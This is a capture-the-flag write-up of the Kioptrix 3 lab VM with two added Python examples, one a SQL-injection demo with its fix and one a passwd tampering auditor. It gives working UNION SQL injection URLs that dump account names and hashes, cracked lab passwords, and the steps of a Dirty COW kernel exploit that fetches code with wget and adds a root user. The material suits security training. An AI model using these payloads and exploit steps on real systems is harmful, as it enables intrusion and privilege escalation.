Kioptrix 3 Write-Up
To prepare for OSCP [1] I’m planning to do a whole bunch of VulnHub VMs and other challenges. Doing these VMs and creating write-ups should give me a good amount of practice before I start the actual PWK [1] course.
Kioptrix 3
The Kioptrix series consists of multiple beginner boot2root VMs, each with multiple ways to gain a root shell [2].
Setup
I’m using VMware with two VMs: Kali 2017.1 and Kioptrix 3.
Scanning & Enumeration
After finding the IP of the Kioptrix VM we can perform the usual Nmap scan to get a quick overview of what is running on it:
root@vm-kali:~# nmap -T4 -sV 172.16.45.135
Starting Nmap 7.40 ( https://nmap.org ) at 2017-08-25 19:35 MDT
Nmap scan report for 172.16.45.135
Host is up (0.00017s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
MAC Address: 00:0C:29:2D:80:64 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.45 seconds
Web Vulnerability
Again I first focused on web-based vulnerabilities to gain access to the system. I was hoping to find a file inclusion vulnerability in the main site, but I had no luck. After that I tried random things in the gallery and happened to stumble across a basic SQLi:
http://kioptrix3.com/gallery/gallery.php?id='&sort=photoid#photos
Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''order by parentid,sort,name' at line 1
Could not select category
Now to abuse this to retrieve useful information from the database:
http://kioptrix3.com/gallery/gallery.php?id=-1 UNION SELECT 1,2,table_name,4,5,6 FROM information_schema.tables WHERE table_schema="gallery"&sort=photoid
gallarific_comments
gallarific_photos
gallarific_stats
dev_accounts
gallarific_galleries
gallarific_settings
gallarific_users
http://kioptrix3.com/gallery/gallery.php?id=-1 UNION SELECT 1,2,column_name,4,5,6 FROM information_schema.columns WHERE table_name="dev_accounts"&sort=photoid
id
password
username
http://kioptrix3.com/gallery/gallery.php?id=-1 UNION SELECT 1,username,password,4,5,6 FROM gallery.dev_accounts&sort=photoid
dreg:0d3eccfb887aabd50f243b3f155c0f85:Mast3r
loneferret:5badcaf789d3d1d09794d8f021f40f0e:starwars
The last query gives us a list of dev accounts with MD5 hashes for which we can find the plaintexts online. These credentials did not work on the admin login, but they did work on SSH.
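The gallery page builds its SQL from the raw id parameter, which is why a lone quote produces a verbose MySQL error and why a UNION with the right column count can pull rows out of any other table. The following added example (my code, not from the write-up or from the gallery application) reproduces that pattern against a constructed in-memory SQLite database with the same six-column shape and a dev_accounts table, then shows the fix: validate the id as an integer and bind it as a query parameter. The photo column names, the sample rows and the placeholder hashes are assumptions, not the real schema or credentials.

```python
import sqlite3

# Constructed stand-in for the gallery database: six photo columns (matching the
# six-column UNION in the write-up) plus a dev_accounts table. The photo column
# names and the sample rows are assumptions, not the real gallery schema.
PHOTO_COLUMNS = "photoid, parentid, sort, name, filename, views"


def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE gallarific_photos (photoid INTEGER, parentid INTEGER, "
                 "sort INTEGER, name TEXT, filename TEXT, views INTEGER)")
    conn.execute("CREATE TABLE dev_accounts (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO gallarific_photos VALUES (?, ?, ?, ?, ?, ?)", [
        (1, 1, 1, "sunset", "sunset.jpg", 10),
        (2, 1, 2, "beach", "beach.jpg", 3),
    ])
    conn.executemany("INSERT INTO dev_accounts VALUES (?, ?, ?)", [
        (1, "dev1", "<md5-hash-placeholder-1>"),  # constructed, not real credentials
        (2, "dev2", "<md5-hash-placeholder-2>"),
    ])
    conn.commit()
    return conn


def photos_vulnerable(conn: sqlite3.Connection, gallery_id: str) -> list:
    """The bug: the request parameter is pasted straight into the SQL string."""
    sql = (f"SELECT {PHOTO_COLUMNS} FROM gallarific_photos "
           f"WHERE parentid={gallery_id} ORDER BY parentid,sort,name")
    return conn.execute(sql).fetchall()


def vulnerable_error_text(conn: sqlite3.Connection, gallery_id: str) -> str:
    """Mirrors the page echoing the raw database error to the browser (empty if no error)."""
    try:
        photos_vulnerable(conn, gallery_id)
        return ""
    except sqlite3.Error as exc:
        return f"Error: {exc}"


def photos_hardened(conn: sqlite3.Connection, gallery_id: str) -> list:
    """The fix: reject anything that is not an integer, then bind it as a parameter."""
    try:
        gid = int(gallery_id)
    except (TypeError, ValueError):
        raise ValueError("gallery id must be an integer") from None
    sql = (f"SELECT {PHOTO_COLUMNS} FROM gallarific_photos "
           "WHERE parentid=? ORDER BY parentid,sort,name")
    return conn.execute(sql, (gid,)).fetchall()


if __name__ == "__main__":
    db = build_db()
    payload = "-1 UNION SELECT 1,username,password,4,5,6 FROM dev_accounts"
    print("quote only ->", vulnerable_error_text(db, "'"))
    print("vulnerable ->", photos_vulnerable(db, payload))
    try:
        photos_hardened(db, payload)
    except ValueError as exc:
        print("hardened   ->", exc)
```

Two things the hardened version changes: the id is parsed as an integer before it gets anywhere near SQL, so the payload never reaches the database at all, and the value is passed as a bound parameter rather than interpolated, so even a string column would not be exploitable this way. A production handler should also log the database error server-side and return a generic message instead of echoing it, since the error text on the page is what confirmed the injection point.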
Privilege Escalation
root@vm-kali:~# ssh loneferret@172.16.45.135
loneferret@172.16.45.135's password:
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Tue Aug 29 21:26:36 2017 from 172.16.45.130
I used the kernel version to find an exploit via searchsploit and ended up with the following one [3], which worked (after trying a couple of other exploits first, because the list was long). As with Kioptrix 2, the source code was transferred to the target via SimpleHTTPServer and wget.
loneferret@Kioptrix3:~/test$ wget http://172.16.45.130:8000/40839.c
--19:31:57-- http://172.16.45.130:8000/40839.c
=> `40839.c'
Connecting to 172.16.45.130:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5,124 (5.0K) [text/plain]
100%[==================================================================================================>] 5,124 --.--K/s
19:31:57 (1001.15 MB/s) - `40839.c' saved [5124/5124]
loneferret@Kioptrix3:~/test$ gcc -pthread 40839.c -o dirty -lcrypt
loneferret@Kioptrix3:~/test$ ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password:
Complete line:
firefart:fi6bS9A.C7BDQ:0:0:pwned:/root:/bin/bash
mmap: b7fe0000
madvise 0
ptrace 0
Done! Check /etc/passwd to see if the new user was created
You can log in with username firefart and password test.
DON'T FORGET TO RESTORE /etc/passwd FROM /tmp/passwd.bak !!!
Done! Check /etc/passwd to see if the new user was created
You can log in with username firefart and password test.
DON'T FORGET TO RESTORE /etc/passwd FROM /tmp/passwd.bak !!!
loneferret@Kioptrix3:~/test$ id
uid=1000(loneferret) gid=100(users) groups=100(users)
Let's use the credentials of the newly created user to log into the target:
root@vm-kali:~# ssh firefart@172.16.45.135
firefart@172.16.45.135's password:
Last login: Tue Aug 29 19:34:19 2017 from 172.16.45.130
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
firefart@Kioptrix3:~# pwd
/root
firefart@Kioptrix3:~# id
uid=0(firefart) gid=0(root) groups=0(root)
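The exploit output above reports a new user written straight into /etc/passwd with uid 0 and a crypt hash in the password field, and it says where the backup of the original file went. Both are things a defender can check for on a host suspected of this kind of tampering. The following added example (my code, not from the write-up or from the exploit) parses passwd(5) content, flags uid-0 accounts other than root and password hashes stored in /etc/passwd rather than /etc/shadow, and diffs the live file against a backup. The sample lines are constructed, except the firefart line, which is quoted from the output above.

```python
from __future__ import annotations

from dataclasses import dataclass

# Constructed sample files. BACKUP_PASSWD stands in for /tmp/passwd.bak;
# CURRENT_PASSWD is the same content plus the firefart line from the exploit
# output in the write-up. Every other line here is made up.
BACKUP_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
loneferret:x:1000:100:loneferret,,,:/home/loneferret:/bin/bash
"""

CURRENT_PASSWD = BACKUP_PASSWD + "firefart:fi6bS9A.C7BDQ:0:0:pwned:/root:/bin/bash\n"

# Password-field values that mean "look in /etc/shadow" or "locked"; anything
# else in that field is a hash (or nothing) stored where it should not be.
SHADOW_MARKERS = {"x", "*", "!", "!!"}


@dataclass(frozen=True)
class PasswdEntry:
    name: str
    passwd: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text: str) -> list[PasswdEntry]:
    """Parse passwd(5) content; every non-empty line must have exactly seven fields."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, passwd, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, passwd, int(uid), int(gid), gecos, home, shell))
    return entries


def audit_passwd(text: str) -> list[str]:
    """Return one finding per suspicious entry; an empty list means nothing was flagged."""
    findings = []
    for e in parse_passwd(text):
        if e.uid == 0 and e.name != "root":
            findings.append(f"{e.name}: uid 0 account other than root")
        if e.passwd == "":
            findings.append(f"{e.name}: empty password field (no password required)")
        elif e.passwd not in SHADOW_MARKERS:
            findings.append(f"{e.name}: password hash stored in /etc/passwd instead of /etc/shadow")
    return findings


def diff_against_backup(current: str, backup: str) -> tuple[list[str], list[str]]:
    """Account names added since the backup, and names whose entry changed."""
    cur = {e.name: e for e in parse_passwd(current)}
    bak = {e.name: e for e in parse_passwd(backup)}
    added = sorted(set(cur) - set(bak))
    changed = sorted(n for n in cur.keys() & bak.keys() if cur[n] != bak[n])
    return added, changed


if __name__ == "__main__":
    for finding in audit_passwd(CURRENT_PASSWD):
        print(finding)
    print("added / changed:", diff_against_backup(CURRENT_PASSWD, BACKUP_PASSWD))
```

On a real host you would feed it the contents of /etc/passwd and either the backup the exploit left behind or, better, a known-good copy kept outside the machine, since an attacker who can rewrite /etc/passwd can also delete /tmp/passwd.bak. The uid-0 check is the one worth running on a schedule; the hash-in-passwd check catches exactly the shortcut this exploit takes, writing a DES crypt hash into the second field so that no change to /etc/shadow is needed.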
Additional notes
As with the last one, I figure there are more ways than this to get into the target, but these were the ones I found.